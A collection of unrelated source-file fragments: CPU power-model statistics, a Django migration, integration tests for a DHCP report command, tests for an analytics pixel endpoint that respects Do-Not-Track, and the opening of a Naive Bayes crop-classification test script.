0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.406746, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.813492, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591622, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283406, 'Memory Management Unit/Area': 0.434579, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.144356, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.14544, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00813591, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.399995, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0605964, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.808057, 'Memory Management Unit/Runtime Dynamic': 0.206037, 'Memory Management Unit/Subthreshold Leakage': 0.0769113, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462, 'Peak Dynamic': 29.9788, 'Renaming Unit/Area': 0.369768, 'Renaming Unit/FP Front End RAT/Area': 0.168486, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.03171, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925, 'Renaming Unit/Free List/Area': 0.0414755, 'Renaming Unit/Free List/Gate Leakage': 4.15911e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0401324, 'Renaming Unit/Free List/Runtime Dynamic': 0.0463516, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987, 'Renaming Unit/Gate Leakage': 0.00863632, 'Renaming Unit/Int Front End RAT/Area': 0.114751, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.326575, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781, 'Renaming Unit/Peak Dynamic': 4.56169, 'Renaming Unit/Runtime Dynamic': 1.40464, 'Renaming Unit/Subthreshold Leakage': 0.070483, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779, 'Runtime Dynamic': 11.3528, 'Subthreshold Leakage': 6.21877, 'Subthreshold Leakage with power gating': 2.58311}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.0890039, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.272596, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.547093, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.200861, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.323981, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.163535, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.688377, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.14585, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.03415, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.103358, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.008425, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0915436, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0623081, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.194901, 'Execution Unit/Register Files/Runtime Dynamic': 0.0707331, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215113, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.541281, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.97836, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch 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'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000412797, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000165494, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with 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'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00405748, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0598983, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.81005, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 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'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.0317548, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.22763, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.185831, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction 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'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.126415, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.532128, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.149092, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power 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'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0935076, 'Execution Unit/Register Files/Runtime Dynamic': 0.054678, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.130973, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.332808, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.55262, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 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pepdb/core/migrations/0113_auto_20170905_1435.py

dchaplinsky/pep.org.ua

8633a65fb657d7f04dbdb12eb8ae705fa6be67e3

[ "MIT" ]

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2015-12-21T03:52:46.000Z

2020-07-24T19:17:23.000Z

pepdb/core/migrations/0113_auto_20170905_1435.py

dchaplinsky/pep.org.ua

8633a65fb657d7f04dbdb12eb8ae705fa6be67e3

[ "MIT" ]

12

2016-03-05T18:11:05.000Z

2021-06-17T20:20:03.000Z

pepdb/core/migrations/0113_auto_20170905_1435.py

dchaplinsky/pep.org.ua

8633a65fb657d7f04dbdb12eb8ae705fa6be67e3

[ "MIT" ]

4

2016-07-17T20:19:38.000Z

2021-03-23T12:47:20.000Z

# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-09-05 11:35 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0112_auto_20170824_0033'), ] operations = [ migrations.AlterField( model_name='company', name='short_name', field=models.CharField(blank=True, max_length=200, verbose_name='\u0421\u043a\u043e\u0440\u043e\u0447\u0435\u043d\u0430 \u043d\u0430\u0437\u0432\u0430'), ), migrations.AlterField( model_name='company', name='short_name_en', field=models.CharField(blank=True, max_length=200, null=True, verbose_name='\u0421\u043a\u043e\u0440\u043e\u0447\u0435\u043d\u0430 \u043d\u0430\u0437\u0432\u0430'), ), migrations.AlterField( model_name='company', name='short_name_uk', field=models.CharField(blank=True, max_length=200, null=True, verbose_name='\u0421\u043a\u043e\u0440\u043e\u0447\u0435\u043d\u0430 \u043d\u0430\u0437\u0432\u0430'), ), migrations.AlterField( model_name='person', name='patronymic', field=models.CharField(blank=True, max_length=40, verbose_name='\u041f\u043e \u0431\u0430\u0442\u044c\u043a\u043e\u0432\u0456'), ), migrations.AlterField( model_name='person', name='patronymic_en', field=models.CharField(blank=True, max_length=40, null=True, verbose_name='\u041f\u043e \u0431\u0430\u0442\u044c\u043a\u043e\u0432\u0456'), ), migrations.AlterField( model_name='person', name='patronymic_uk', field=models.CharField(blank=True, max_length=40, null=True, verbose_name='\u041f\u043e \u0431\u0430\u0442\u044c\u043a\u043e\u0432\u0456'), ), ]

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Python

test-framework/test-suites/integration/tests/report/test_report_dhcpd.py

knutsonchris/stacki

33087dd5fa311984a66ccecfeee6f9c2c25f665d

[ "BSD-3-Clause" ]

123

2015-05-12T23:36:45.000Z

2017-07-05T23:26:57.000Z

test-framework/test-suites/integration/tests/report/test_report_dhcpd.py

knutsonchris/stacki

33087dd5fa311984a66ccecfeee6f9c2c25f665d

[ "BSD-3-Clause" ]

177

2015-06-05T19:17:47.000Z

2017-07-07T17:57:24.000Z

test-framework/test-suites/integration/tests/report/test_report_dhcpd.py

knutsonchris/stacki

33087dd5fa311984a66ccecfeee6f9c2c25f665d

[ "BSD-3-Clause" ]

32

2015-06-07T02:25:03.000Z

2017-06-23T07:35:35.000Z

class TestReportDhcpd: def test_duplicate_interface(self, host): result = host.run( 'stack add host interface frontend-0-0 interface=eth0 mac=00:11:22:33:44:55 ip=1.2.3.4 network=private' ) assert result.rc == 0 result = host.run('stack set host interface interface frontend-0-0 mac=00:11:22:33:44:55 interface=eth1') assert result.rc == 0 # duplicate interface should be excluded from report result = host.run('stack report dhcpd') assert result.rc == 0 assert result.stdout.count('eth1') == 2 def test_invalid_channel(self, host): result = host.run('stack add host interface frontend-0-0 interface=eth0 mac=00:11:22:33:44:55 channel=alvin') assert result.rc == 0 # interface with invalid channel should be excluded from report result = host.run('stack report dhcpd') assert result.rc == 0 assert 'eth0' not in result.stdout def test_invalid_ipmi_channel(self, host): result = host.run('stack add host interface frontend-0-0 interface=ipmi channel=1') assert result.rc == 0 # interface with invalid channel should be excluded from report result = host.run('stack report dhcpd') assert result.rc == 0 assert 'eth0' not in result.stdout def test_single_pxe_network_sles(self, host, fake_os_sles, revert_etc, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # The default network has a single PXE interface result = host.run('stack report dhcpd') assert result.rc == 0 with open(test_file('report/dhcpd_single_pxe_network_sles.txt')) as output: assert result.stdout == output.read() def test_single_pxe_network_redhat(self, host, fake_os_redhat, revert_etc, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # The default network has a single PXE interface result = host.run('stack report dhcpd') assert result.rc == 0 with open(test_file('report/dhcpd_single_pxe_network_redhat.txt')) as output: assert result.stdout == output.read() def test_multiple_pxe_networks(self, host, host_os, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # Add a PXE test network in 10-dot result = host.run('stack add network test address=10.0.0.0 mask=255.255.255.0 gateway=10.0.0.1 pxe=true') assert result.rc == 0 # Add a second interface on the test network to the frontend result = host.run('stack add host interface frontend-0-0 interface=eth3 network=test') assert result.rc == 0 # Generate our dhcpd file result = host.run('stack report dhcpd') assert result.rc == 0 with open(test_file(f'report/dhcpd_multiple_pxe_networks_{host_os}.txt')) as output: assert result.stdout == output.read() def test_shared_network_sles(self, host, fake_os_sles, revert_etc, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # Add two test networks with PXE result = host.run('stack add network test-0 address=10.0.0.0 mask=255.255.255.0 gateway=10.0.0.1 pxe=true') assert result.rc == 0 result = host.run('stack add network test-1 address=10.0.1.0 mask=255.255.255.0 gateway=10.0.1.1 pxe=true') assert result.rc == 0 # Add two virtual interfaces on the frontend, one on each test network result = host.run('stack add host interface localhost interface=eth2:0 network=test-0 ip=10.0.0.2') assert result.rc == 0 result = host.run('stack add host interface localhost interface=eth2:1 network=test-1 ip=10.0.1.2') assert result.rc == 0 # Generate our dhcpd file result = host.run('stack report dhcpd') assert result.rc == 0 # Make sure we get the expected output with open(test_file('report/dhcpd_shared_network_sles.txt')) as output: assert result.stdout == output.read() def test_shared_network_redhat(self, host, fake_os_redhat, revert_etc, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # Add two test networks with PXE result = host.run('stack add network test-0 address=10.0.0.0 mask=255.255.255.0 gateway=10.0.0.1 pxe=true') assert result.rc == 0 result = host.run('stack add network test-1 address=10.0.1.0 mask=255.255.255.0 gateway=10.0.1.1 pxe=true') assert result.rc == 0 # Add two virtual interfaces on the frontend, one on each test network result = host.run('stack add host interface localhost interface=eth2:0 network=test-0 ip=10.0.0.2') assert result.rc == 0 result = host.run('stack add host interface localhost interface=eth2:1 network=test-1 ip=10.0.1.2') assert result.rc == 0 # Generate our dhcpd file result = host.run('stack report dhcpd') assert result.rc == 0 # Make sure we get the expected output with open(test_file('report/dhcpd_shared_network_redhat.txt')) as output: assert result.stdout == output.read() def test_resolve_ip_exception(self, host, host_os, test_file): # Change the mac on eth1 so it will match our expected outputs result = host.run('stack set host interface mac frontend-0-0 interface=eth1 mac=00:11:22:33:44:55') assert result.rc == 0 # Change the gateway on the private network, so that will match result = host.run('stack set network gateway private gateway=192.168.0.1') assert result.rc == 0 # Add a PXE test network in 10-dot result = host.run('stack add network test address=10.0.0.0 mask=255.255.255.0 gateway=10.0.0.1 pxe=true') assert result.rc == 0 # Add a second interface on the test network to the frontend # without an ip but with a channel result = host.run( 'stack add host interface frontend-0-0 interface=eth2 mac=AA:BB:CC:DD:EE:FF network=test channel=eth3' ) assert result.rc == 0 # Add a third interface which will not have an ip, but instead # reference a channel device that doesn't exist result = host.run('stack add host interface frontend-0-0 interface=eth3 channel=eth4') assert result.rc == 0 # Generate our dhcpd file, which should skip eth2 because of the # exception trying to figure out the IP result = host.run('stack report dhcpd') assert result.rc == 0 # Make sure we get the expected output with open(test_file(f'report/dhcpd_multiple_pxe_networks_{host_os}.txt')) as output: assert result.stdout == output.read()

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1

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null

0

1

0

8

0378803b496027424db313351c414d4201bba7c6

5,539

py

Python

panalytics/core/tests/test_view_collect.py

mikesmith/panalytics

6ee5d783a71878282518bb733e173c0d8284a600

[ "MIT" ]

null

panalytics/core/tests/test_view_collect.py

mikesmith/panalytics

6ee5d783a71878282518bb733e173c0d8284a600

[ "MIT" ]

4

2021-03-30T12:48:33.000Z

2021-06-10T18:30:42.000Z

panalytics/core/tests/test_view_collect.py

mikesmith/panalytics

6ee5d783a71878282518bb733e173c0d8284a600

[ "MIT" ]

null

from django.test import RequestFactory from unittest.mock import patch from ..views import collect, PXL @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_calls_create_from_request_when_dnt_disabled_url_exists( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'url': 'http://example.com', 'tid': 'PA-TESTTRACK'}, HTTP_DNT='0') collect(request) assert mock_create_from_request.call_count == 1 assert mock_create_from_request.call_args[0] == (request,) @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_calls_create_from_request_when_dnt_not_given_url_exists( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'url': 'http://example.com', 'tid': 'PA-TESTTRACK'}) collect(request) assert mock_create_from_request.call_count == 1 assert mock_create_from_request.call_args[0] == (request,) @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_does_not_call_create_from_request_when_dnt_enabled_url_exists( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'url': 'http://example.com', 'tid': 'PA-TESTTRACK'}, HTTP_DNT='1') collect(request) assert mock_create_from_request.call_count == 0 @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_does_not_call_create_from_request_when_url_not_given( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'tid': 'PA-TESTTRACK'}) collect(request) assert mock_create_from_request.call_count == 0 @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_does_not_call_create_from_request_when_tid_not_given( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = False request = RequestFactory().get('/a.gif', {'url': 'http://example.com'}) collect(request) assert mock_create_from_request.call_count == 0 @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_returns_correct_response_with_valid_request( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'url': 'http://example.com', 'tid': 'PA-TESTTRACK'}, HTTP_DNT='0') response = collect(request) assert response.status_code == 200 assert response['content-type'] == 'image/gif' assert PXL in response.content assert response['cache-control'] == 'private, no-cache' @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_returns_correct_response_with_dnt_enabled( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'url': 'http://example.com', 'tid': 'PA-TESTTRACK'}, HTTP_DNT='1') response = collect(request) assert response.status_code == 200 assert response['content-type'] == 'image/gif' assert PXL in response.content assert response['cache-control'] == 'private, no-cache' @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_returns_correct_response_with_missing_url( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = True request = RequestFactory().get('/a.gif', {'tid': 'PA-TESTTRACK'}) response = collect(request) assert response.status_code == 200 assert response['content-type'] == 'image/gif' assert PXL in response.content assert response['cache-control'] == 'private, no-cache' @patch('panalytics.core.models.Project.is_valid_tracking_id') @patch('panalytics.core.models.PageView.create_from_request') def test_collect_returns_correct_response_with_invalid_tid( mock_create_from_request, mock_is_valid_tracking_id ): mock_is_valid_tracking_id.return_value = False request = RequestFactory().get('/a.gif', {'url': 'http://example.com'}) response = collect(request) assert response.status_code == 200 assert response['content-type'] == 'image/gif' assert PXL in response.content assert response['cache-control'] == 'private, no-cache'

39.283688

79

0.701932

700

5,539

5.165714

0.098571

0.082965

0.14104

0.126936

0.956582

0.955752

0

0.005105

0.186676

5,539

140

80

39.564286

0.797558

0

0.883929

0

0.25853

0.165734

0

0.205357

1

0.080357

false

0

0.026786

0

0.107143

0

null

0

1

0

1

0

null

0

7

3018191f67e8c3f5cc170b02291e7702fc8d00f8

35,886

py

Python

Python/Classification Test/NB/nbTest.py

DrMoe/Evaluation-of-satellite-imagery-based-crop-classification

ca7324ee6e5c399ea08d2c3ac11497e4ed95f473

[ "MIT" ]

9

2018-01-07T14:51:19.000Z

2021-05-06T18:58:13.000Z

Python/Classification Test/NB/nbTest.py

DrMoe/Evaluation-of-satellite-imagery-based-crop-classification

ca7324ee6e5c399ea08d2c3ac11497e4ed95f473

[ "MIT" ]

null

Python/Classification Test/NB/nbTest.py

DrMoe/Evaluation-of-satellite-imagery-based-crop-classification

ca7324ee6e5c399ea08d2c3ac11497e4ed95f473

[ "MIT" ]

5

2017-05-31T15:01:42.000Z

2019-12-27T07:27:44.000Z

import os import errno import datetime import time import csv import sys import socket import timeit import sys from NB import nbClassifier from CalculateScore import Calculate_Metrics from printPDF import printPDF from printCSV import printCSV from loadTestSet import loadTestSet from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score # Import section import numpy as np import matplotlib.pyplot as plt # Test Data Setup dates = ['08-05-16', '11-04-16', '15-09-16', '19-03-16'] datestitle = ['at 8$^{th}$ of May, 2016', 'at 11$^{th}$ of April, 2016', 'at 15$^{th}$ of Sep, 2016', 'at 19$^{th}$ of March, 2016'] datefiles = ['0805', '1104', '1509', '1903', 'MergedSet'] filled_markers = ['|-', 'v-', '^-', '<-', '>-', '4-', 's-', 'p-', '*-', '1-', '+-', 'D-', '.-', 'o-'] ## Random Pixel Values for set in range(0, 4): y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_' + dates[set] + '_Random' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Random pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/Random Pixels/' + dates[set] + '/' training_file = str(samples) + 'SamplesPrClassBandset_Random_' + datefiles[set] + '_resampled.csv' traning_set = t_path + 